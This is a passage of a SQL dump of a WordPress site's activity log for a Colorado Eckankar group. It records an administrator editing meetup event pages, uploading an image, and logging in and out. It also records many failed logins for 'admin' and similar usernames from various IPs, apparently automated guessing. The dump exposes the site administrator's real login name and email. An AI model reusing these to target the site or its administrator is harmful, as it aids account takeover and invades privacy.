9920,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(235258,39920,'_server_remote_addr','76.130.120.x'),(235255,39920,'_user_login','S8zhaBda'),(235256,39920,'_user_email','nada@zipnadanot.org'),(235257,39920,'_message_key','user_logged_out'),(235254,39920,'_user_id','2'),(235253,39919,'_server_remote_addr','66.55.65.x'),(235252,39919,'_message_key','user_unknown_login_failed'),(235251,39919,'server_http_user_agent','Mozilla/5.0'),(235250,39919,'failed_username','admin'),(235249,39918,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(235248,39918,'_server_remote_addr','76.130.120.x'),(235247,39918,'_message_key','user_logged_in'),(235246,39918,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(235245,39918,'_user_email','nada@zipnadanot.org'),(235244,39918,'_user_login','S8zhaBda'),(235243,39918,'_user_id','2'),(235221,39914,'_server_remote_addr','66.55.65.x'),(235222,39915,'failed_username','admin'),(235223,39915,'server_http_user_agent','Mozilla/5.0'),(235224,39915,'_message_key','user_unknown_login_failed'),(235225,39915,'_server_remote_addr','66.55.65.x'),(235226,39916,'failed_username','admin'),(235227,39916,'server_http_user_agent','Mozilla/5.0'),(235228,39916,'_message_key','user_unknown_login_failed'),(235229,39916,'_server_remote_addr','66.55.65.x'),(235230,39917,'user_id','2'),(235231,39917,'user_email','nada@zipnadanot.org'),(235232,39917,'user_login','S8zhaBda'),(235233,39917,'_user_id','2'),(235234,39917,'_user_login','S8zhaBda'),(235235,39917,'_user_email','nada@zipnadanot.org'),(235236,39917,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(235237,39917,'_message_key','user_logged_in'),(235238,39917,'_server_remote_addr','76.130.120.x'),(235239,39917,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(235240,39918,'user_id','2'),(235241,39918,'user_email','nada@zipnadanot.org'),(235242,39918,'user_login','S8zhaBda'),(235196,39908,'_message_key','user_unknown_login_failed'),(235197,39908,'_server_remote_addr','209.141.46.x'),(235198,39909,'failed_username','admin'),(235199,39909,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(235200,39909,'_message_key','user_unknown_login_failed'),(235201,39909,'_server_remote_addr','209.141.46.x'),(235202,39910,'failed_username','admin'),(235203,39910,'server_http_user_agent','Mozilla/5.0'),(235204,39910,'_message_key','user_unknown_login_failed'),(235205,39910,'_server_remote_addr','66.55.65.x'),(235206,39911,'failed_username','admin'),(235207,39911,'server_http_user_agent','Mozilla/5.0'),(235208,39911,'_message_key','user_unknown_login_failed'),(235209,39911,'_server_remote_addr','66.55.65.x'),(235210,39912,'failed_username','administrator'),(235211,39912,'server_http_user_agent','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0'),(235212,39912,'_message_key','user_unknown_login_failed'),(235213,39912,'_server_remote_addr','199.195.250.x'),(235214,39913,'failed_username','admin'),(235215,39913,'server_http_user_agent','Mozilla/5.0'),(235216,39913,'_message_key','user_unknown_login_failed'),(235217,39913,'_server_remote_addr','66.55.65.x'),(235218,39914,'failed_username','admin'),(235219,39914,'server_http_user_agent','Mozilla/5.0'),(235220,39914,'_message_key','user_unknown_login_failed'),(235194,39908,'failed_username','admin'),(235195,39908,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9'),(235193,39907,'_server_remote_addr','66.55.65.x'),(235192,39907,'_message_key','user_unknown_login_failed'),(235191,39907,'server_http_user_agent','Mozilla/5.0'),(235190,39907,'failed_username','admin'),(235189,39906,'_server_remote_addr','66.55.65.x'),(235188,39906,'_message_key','user_unknown_login_failed'),(235187,39906,'server_http_user_agent','Mozilla/5.0'),(235186,39906,'failed_username','admin'),(235185,39905,'_server_remote_addr','66.55.65.x'),(235183,39905,'server_http_user_agent','Mozilla/5.0'),(235184,39905,'_message_key','user_unknown_login_failed'),(235182,39905,'failed_username','admin'),(235181,39904,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(235180,39904,'_server_remote_addr','76.130.120.x'),(235179,39904,'_message_key','user_logged_out'),(235178,39904,'_user_email','nada@zipnadanot.org'),(235177,39904,'_user_login','S8zhaBda'),(235176,39904,'_user_id','2'),(235175,39903,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269268&action=edit'),(235174,39903,'_server_remote_addr','76.130.120.x'),(235171,39903,'_user_id','2'),(235172,39903,'_user_login','S8zhaBda'),(235173,39903,'_user_email','nada@zipnadanot.org'),(235170,39903,'_message_key','post_updated'),(235168,39903,'post_type','mec-events'),(235169,39903,'post_title','Life&#8217;s Purpose'),(235167,39903,'post_id','269268'),(235166,39902,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269268'),(235165,39902,'_server_remote_addr','76.130.120.x'),(235164,39902,'_user_email','nada@zipnadanot.org'),(235163,39902,'_user_login','S8zhaBda'),(235162,39902,'_user_id','2'),(235159,39902,'post_new_thumb_id','269269'),(235160,39902,'post_new_thumb_title','birds-chain-3'),(235161,39902,'_message_key','post_updated'),(235158,39902,'post_new_post_date_gmt','2023-10-25 20:55:03'),(235157,39902,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(235156,39902,'post_new_post_date','2023-10-25 14:55:03'),(235155,39902,'post_prev_post_date','2023-10-25 14:53:28'),(235154,39902,'post_new_post_status','publish'),(235153,39902,'post_prev_post_status','draft'),(235152,39902,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Go higher, further, deeper on your path of spiritual self-discovery!<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Let your own unique talents and interests create a pathway of discovery that leads to your highest destiny as Soul! Become a creative expression of divine love, serving all life with gratitude and joy.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">\"The purpose of life is to become a Coworker with God. It means service to others, using our talents and interests to give hand, ear, or heart to another in need.\" --Harold Klemp, Past Lives, Dreams and Soul Travel, p. 17.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are invited to attend this interactive discussion, during which we will be utilizing the tools, exercises, techniques, stories, and inspiration in the ‘<a href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\">Finding Your Life’s Purpose</a>‘ e-booklet </span><span style=\"font-size: 14pt;\">available for free online.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296651140/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235150,39902,'post_new_post_name','lifes-purpose'),(235151,39902,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Go higher, further, deeper on your path of spiritual self-discovery!<br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Let your own unique talents and interests create a pathway of discovery that leads to your highest destiny as Soul! Become a creative expression of divine love, serving all life with gratitude and joy.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">\"The purpose of life is to become a Coworker with God. It means service to others, using our talents and interests to give hand, ear, or heart to another in need.\" --Harold Klemp, Past Lives, Dreams and Soul Travel, p. 17.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">You are invited to attend this interactive discussion, during which we will be utilizing the tools, exercises, techniques, stories, and inspiration in the ‘<a href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\">Finding Your Life’s Purpose</a>‘ e-booklet </span><span style=\"font-size: 14pt;\">available for free online.</span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296651140/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\n</div>\n</div>\n</div>\n</div>'),(235149,39902,'post_prev_post_name',''),(235148,39902,'post_title','Life&#8217;s Purpose'),(235147,39902,'post_type','mec-events'),(235146,39902,'post_id','269268'),(235144,39901,'_server_remote_addr','76.130.120.x'),(235145,39901,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269268'),(235143,39901,'_user_email','nada@zipnadanot.org'),(235142,39901,'_user_login','S8zhaBda'),(235141,39901,'_user_id','2'),(235140,39901,'_message_key','attachment_created'),(235139,39901,'attachment_parent_post_type','mec-events'),(235138,39901,'attachment_parent_title','Life&#8217;s Purpose'),(235135,39901,'attachment_mime','image/jpeg'),(235136,39901,'attachment_filesize','82271'),(235137,39901,'attachment_parent_id','269268'),(235134,39901,'attachment_filename','birds-chain-3.jpg'),(235133,39901,'attachment_title','birds-chain-3'),(235132,39901,'attachment_id','269269'),(235131,39901,'post_type','attachment'),(235129,39900,'_server_remote_addr','76.130.120.x'),(235130,39900,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269268'),(235128,39900,'_user_email','nada@zipnadanot.org'),(235127,39900,'_user_login','S8zhaBda'),(235125,39900,'_message_key','post_updated'),(235126,39900,'_user_id','2'),(235124,39900,'post_meta_added','78'),(235123,39900,'post_title','Life&#8217;s Purpose'),(235122,39900,'post_type','mec-events'),(235121,39900,'post_id','269268'),(235120,39899,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269268'),(235118,39899,'_user_email','nada@zipnadanot.org'),(235119,39899,'_server_remote_addr','76.130.120.x'),(235117,39899,'_user_login','S8zhaBda'),(235116,39899,'_user_id','2'),(235115,39899,'_message_key','post_updated'),(235114,39899,'post_meta_added','78'),(235112,39899,'post_type','mec-events'),(235113,39899,'post_title','Life&#8217;s Purpose'),(235100,39897,'_server_remote_addr','66.55.65.x'),(235101,39898,'post_id','269268'),(235102,39898,'post_type','mec-events'),(235103,39898,'post_title','Life&#8217;s Purpose'),(235104,39898,'post_meta_added','78'),(235105,39898,'_message_key','post_updated'),(235106,39898,'_user_id','2'),(235107,39898,'_user_login','S8zhaBda'),(235108,39898,'_user_email','nada@zipnadanot.org'),(235109,39898,'_server_remote_addr','76.130.120.x'),(235110,39898,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269268'),(235111,39899,'post_id','269268'),(235097,39897,'failed_username','admin'),(235098,39897,'server_http_user_agent','Mozilla/5.0'),(235099,39897,'_message_key','user_unknown_login_failed'),(235096,39896,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(235087,39896,'new_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(235095,39896,'_server_remote_addr','76.130.120.x'),(235093,39896,'_user_login','S8zhaBda'),(235094,39896,'_user_email','nada@zipnadanot.org'),(235088,39896,'new_post_id','269268'),(235089,39896,'duplicated_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(235090,39896,'duplicated_post_id','267696'),(235091,39896,'_message_key','post_duplicated'),(235092,39896,'_user_id','2'),(235078,39895,'post_id','269268'),(235079,39895,'post_type','mec-events'),(235080,39895,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(235081,39895,'_message_key','post_updated'),(235082,39895,'_user_id','2'),(235083,39895,'_user_login','S8zhaBda'),(235084,39895,'_user_email','nada@zipnadanot.org'),(235085,39895,'_server_remote_addr','76.130.120.x'),(235086,39895,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(235076,39894,'_server_remote_addr','76.130.120.x'),(235077,39894,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269265&action=edit'),(235075,39894,'_user_email','nada@zipnadanot.org'),(235074,39894,'_user_login','S8zhaBda'),(235073,39894,'_user_id','2'),(235072,39894,'_message_key','post_updated'),(235071,39894,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<strong><span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span></strong><br>\r\n<span style=\"font-size: 12pt;\"><em>Stories to Help You See God In Your Life: The Book of ECK Parables</em>, Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235061,39893,'_message_key','post_updated'),(235062,39893,'_user_id','2'),(235063,39893,'_user_login','S8zhaBda'),(235064,39893,'_user_email','nada@zipnadanot.org'),(235065,39893,'_server_remote_addr','76.130.120.x'),(235066,39893,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269265&action=edit'),(235067,39894,'post_id','269265'),(235068,39894,'post_type','mec-events'),(235069,39894,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(235070,39894,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<strong><span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span></strong><br>\r\n<span style=\"font-size: 12pt;\"><em>Stories to Help You See God In Your Life: The Book of ECK Parables</em>, Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235060,39893,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<strong><span style=\"font-size: 14pt;\">\"Do one thing each day for love alone. Don\'t expect any kind of reward.\"</span></strong><br>\r\n<span style=\"font-size: 12pt;\"><em>Stories to Help You See God In Your Life: The Book of ECK Parables</em>, Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235057,39893,'post_type','mec-events'),(235058,39893,'post_title','Write the Screenplay of Your Life As a Love Story that Matters'),(235059,39893,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">What are you passionate about?<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span><br>\r\n<strong><span style=\"font-size: 14pt;\">\"<em>Do one thing each day for love alone. Don\'t expect any kind of reward.</em>\"</span></strong><br>\r\n<span style=\"font-size: 14pt;\">Stories to Help You See God In Your Life: The Book of ECK Parables,</span><br>\r\n<span style=\"font-size: 14pt;\">Vol. 4.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open conversation about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">This is sponsored by ECKANKAR as a community service.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/296733324/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(235055,39892,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269265&action=edit'),(235056,39893,'post_id','269265'),(235054,39892,'_server_remote_addr','76.130.120.x'),(235051,39892,'_user_id','2'),(235052,39892,'_user_login','S8zhaBda'),(235053,39892,'_user_email','nada@zipnadanot.org'),(235050,39892,'_message_key','post_updated'),(232895,39500,'_message_key','user_unknown_login_failed'),(232896,39500,'_server_remote_addr','20.163.25.x'),(232897,39501,'failed_username','admin'),(232898,39501,'server_http_user_agent','Mozilla/5.0'),(232899,39501,'_message_key','user_unknown_login_failed'),(232900,39501,'_server_remote_addr','20.38.46.x'),(232901,39502,'failed_username','wwwadmin'),(232902,39502,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(232903,39502,'_message_key','user_unknown_login_failed'),(232904,39502,'_server_remote_addr','51.77.53.x'),(232905,39503,'failed_username','wwwadmin'),(232906,39503,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(232907,39503,'_message_key','user_unknown_login_failed'),(232908,39503,'_server_remote_addr','51.77.53.x'),(232909,39504,'failed_username','admin'),(232910,39504,'server_http_user_agent','Mozilla/5.0'),(232911,39504,'_message_key','user_unknown_login_failed'),(232912,39504,'_server_remote_addr','20.168.9.x'),(232913,39505,'failed_username','admin'),(232914,39505,'server_http_user_agent','Mozilla/5.0'),(232915,39505,'_message_key','user_unknown_login_failed'),(232916,39505,'_server_remote_addr','20.163.25.x'),(232917,39506,'failed_username','admin'),(232918,39506,'server_http_user_agent','Mozilla/5.0'),(232919,39506,'_message_key','user_unknown_login_failed'),(232920,39506,'_server_remote_addr','20.38.46.x'),(232921,39507,'failed_username','admin'),(232922,39507,'server_http_user_agent','Mozilla/5.0'),(232923,39507,'_message_key','user_unknown_login_failed'),(232924,39507,'_server_remote_addr','20.168.9.x'),(232925,39508,'failed_username','admin'),(232926,39508,'server_http_user_agent','Mozilla/5.0'),(232927,39508,'_message_key','user_unknown_login_failed'),(232928,39508,'_server_remote_addr','20.163.25.x'),(232929,39509,'failed_username','admin'),(232930,39509,'server_http_user_agent','Mozilla/5.0'),(232931,39509,'_message_key','user_unknown_login_failed'),(232932,39509,'_server_remote_addr','20.38.46.x'),(232933,39510,'failed_username','admin'),(232934,39510,'server_http_user_agent','Mozilla/5.0'),(232935,39510,'_message_key','user_unknown_login_failed'),(232936,39510,'_server_remote_addr','20.168.9.x'),(232937,39511,'failed_username','admin'),(232938,39511,'server_http_user_agent','Mozilla/5.0'),(232939,39511,'_message_key','user_unknown_login_failed'),(232940,39511,'_server_remote_addr','20.163.25.x'),(232941,39512,'failed_username','admin'),(232942,39512,'server_http_user_agent','Mozilla/5.0'),(232943,39512,'_message_key','user_unknown_login_failed'),(232944,39512,'_server_remote_addr','20.38.46.x'),(232945,39513,'failed_username','admin'),(232946,39513,'server_http_user_agent','Mozilla/5.0'),(232947,39513,'_message_key','user_unknown_login_failed'),(232948,39513,'_server_remote_addr','20.168.9.x'),(232949,39514,'failed_username','admin'),(232950,39514,'server_http_user_agent','Mozilla/5.0'),(232951,39514,'_message_key','user_unknown_login_failed'),(232952,39514,'_server_remote_addr','20.163.25.x'),(232953,39515,'failed_username','admin'),(232954,39515,'server_http_user_agent','Mozilla/5.0'),(232955,39515,'_message_key','user_unknown_login_failed'),(232956,39515,'_server_remote_addr','20.38.46.x'),(232957,39516,'failed_username','admin'),(232958,39516,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(232959,39516,'_message_key','user_unknown_login_failed'),(232960,39516,'_xmlrpc_request','true'),(232961,39516,'_server_remote_addr','20.168.2.x'),(232962,39517,'failed_username','admin'),(232963,39517,'server_http_user_agent','Mozilla/5.0'),(232964,39517,'_message_key','user_unknown_login_failed'),(232965,39517,'_server_remote_addr','20.168.9.x'),(232966,39518,'failed_username','admin'),(232967,39518,'server_http_user_agent','Mozilla/5.0'),(232968,39518,'_message_key','user_unknown_login_failed'),(232969,39518,'_server_remote_addr','20.163.25.x'),(232970,39519,'failed_username','admin'),(232971,39519,'server_http_user_agent','Mozilla/5.0'),(232972,39519,'_message_key','user_unknown_login_failed'),(232973,39519,'_server_remote_addr','20.38.46.x'),(232974,39520,'failed_username','admin'),(232975,39520,'server_http_user_agent','Mozilla/5.0'),(232976,39520,'_message_key','user_unknown_login_failed'),(232977,39520,'_server_remote_addr','20.38.46.x'),(232978,39521,'failed_username','admin'),(232979,39521,'server_http_user_agent','Mozilla/5.0